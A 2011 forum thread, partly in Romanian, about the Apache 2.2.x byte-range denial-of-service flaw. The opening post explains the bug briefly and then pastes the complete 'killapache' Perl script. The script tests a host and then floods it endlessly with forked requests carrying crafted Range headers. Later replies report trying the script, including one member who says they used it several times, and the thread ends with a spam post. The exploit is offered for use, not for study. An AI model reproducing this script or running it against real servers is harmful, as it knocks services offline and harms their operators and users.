M2G Posted August 28, 2011 Report Posted August 28, 2011 The Apache Software Foundation has announced a denial-of-service vulnerability that affects all versions of the ubiquitous Apache web server, leaving up to 65% of all websites vulnerable. A unknown flaw in the code for processing byte range headers allows versions 2.2.x of the Apache Web Server to be crippled from a single PC. A suitable “Apache Killer” Perl script that impressively demonstrates the problem.How does killapache DDOS tool work?killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.There is no patch yet released for this vulnerability on apache, but a few work arounds have been found. These have been posted by The Apache Software Foundation and can be used until a stable fix is released.The vulnerability works by exploiting a feature in web servers that gives you the ability to pause and resume your downloads. These days if you have to stop downloading something part-way through you can generally pick up where you left off and you don't have to start again from scratch.Killapache: Apache killer -THN - Pastebin.com#Apache httpd Remote Denial of Service (memory exhaustion)#By Kingcope#Year 2011## Will result in swapping memory to filesystem on the remote side# plus killing of processes when running out of swap space.# Remote System becomes unstable.#use IO::Socket;use Parallel::ForkManager;sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl <host> [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n";}sub killapache {print "ATTACKING $ARGV[0] [using $numforks forks]\n";$pm = new Parallel::ForkManager($numforks);$|=1;srand(time());$p = "";for ($k=0;$k<1300;$k++) { $p .= ",5-$k";}for ($k=0;$k<$numforks;$k++) {my $pid = $pm->start and next; $x = "";my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp');$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";print $sock $p;while(<$sock>) {} $pm->finish;}$pm->wait_all_children;print ":pPpPpppPpPPppPpppPp\n";}sub testapache {my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp');$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";print $sock $p;$x = <$sock>;if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; }}if ($#ARGV < 0) { usage; exit; }if ($#ARGV > 1) { $numforks = $ARGV[1];} else {$numforks = 50;}$v = testapache();if ($v == 0) { print "Host does not seem vulnerable\n"; exit; }while(1) {killapache();}Killapache: DDOS tool - Half of the Internet is vulnerable now ! ~ THN : The Hacker News Quote
qbert Posted August 28, 2011 Report Posted August 28, 2011 D:\Documents and Settings\Administrator\Desktop>perl apache.pl 127.0.0.1 50Host does not seem vulnerable pe Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 Quote
Xander Posted August 28, 2011 Report Posted August 28, 2011 am impresia ca a mai fost postat si de nytro si oricum merge pe foarte putine Quote
Zatarra Posted August 28, 2011 Report Posted August 28, 2011 Da, a mai fost postat:http://rstcenter.com/forum/39305-apache-httpd-remote-denial-service-memory-exhaustion.rst Quote
M2G Posted August 28, 2011 Author Report Posted August 28, 2011 Scuze, am crezut ca azi a aparut exploitul si nici nu am mai cautat pe forum Quote
turnback Posted September 15, 2011 Report Posted September 15, 2011 Eu l-am folosit de cateva ori, fara succes. Lots of :ppPPPppPPPppp Quote
jerry0503222 Posted September 20, 2011 Report Posted September 20, 2011 Pwnd )) ___________________________________Coach Handbags , Coach Purses , Coach Outlet Quote